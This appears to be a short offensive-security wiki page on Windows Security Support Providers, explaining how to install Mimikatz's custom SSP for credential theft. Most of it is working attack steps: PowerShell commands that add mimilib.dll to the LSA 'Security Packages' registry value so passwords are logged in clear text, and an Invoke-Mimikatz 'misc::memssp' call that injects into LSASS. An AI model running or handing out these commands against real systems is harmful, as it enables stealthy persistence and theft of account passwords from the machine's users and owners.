Custom SSP
Custom SSP
Security Support Provider (SSP) is a DLL which provides ways for application to obtain an authenticated connection. For example: NTLM, Kerberos, Wdigest, CredSSP.
Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.
We can either:
Drop the mimilib.dll to system32 and add mimilib to
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name
'Security Packages' -Value $packages
OR:
Using Mimikatz, inject into LSASS
Invoke-Mimikatz -Command '"misc::memssp"'
Last updated